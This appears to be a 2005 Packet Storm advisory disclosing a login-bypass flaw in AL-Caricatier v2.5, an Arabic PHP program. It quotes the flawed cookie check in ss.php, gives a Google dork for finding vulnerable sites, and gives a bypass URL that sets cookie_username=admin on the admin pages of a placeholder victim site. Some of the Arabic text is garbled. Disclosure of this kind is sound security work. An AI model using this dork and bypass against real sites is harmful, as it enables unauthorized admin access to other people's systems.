AL-Caricatier.txt

2005-10-26T00:00:00
ID PACKETSTORM:40964
Type packetstorm
Reporter MoHaJaLi
Modified 2005-10-26T00:00:00

Description

                                        
                                            `Vulnerability in AL-Caricatier,V.2.5  
  
Hello...  
i found a vulneribility in an program called AL-Caricatier it's an  
  
arabic program  
  
site:  
http://www.php-ar.com  
  
Vulnerability:  
Login Bypass  
  
GoogleDork:  
inurl:view_caricatier. php  
  
Vunlerability in an included file called ss.php which resides in  
  
the admin directory...  
  
if($cookie_username){  
echo"";  
}else{  
echo"<font face='tahoma' size='2'>You Didn't Sign in äå Êâå ÈÊÓÌêä  
  
ÇäÏÎèä</b>";  
echo"<meta http-equiv='Refresh' content='1;  
  
url=admin_login.php'>";  
EXIT;  
}  
  
the admin directory is protected user and password but u can  
  
bypass them by going to this link:  
  
www.victim.com/view_caricatier.php<http://www.victim.com/view_caricatier.php>  
  
To bypass:  
www.victim.com/admin/welcome.php?cookie_username=admin<http://www.victim.com/admin/welcome.php?cookie_username=admin>  
or any of the admin files instead of welcome.php  
like :  
add-flashFile.php  
caricatier_add.php  
delete_cat.php  
  
and u r in the admin interface...  
  
  
  
  
--  
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF  
Genuises....(c)  
`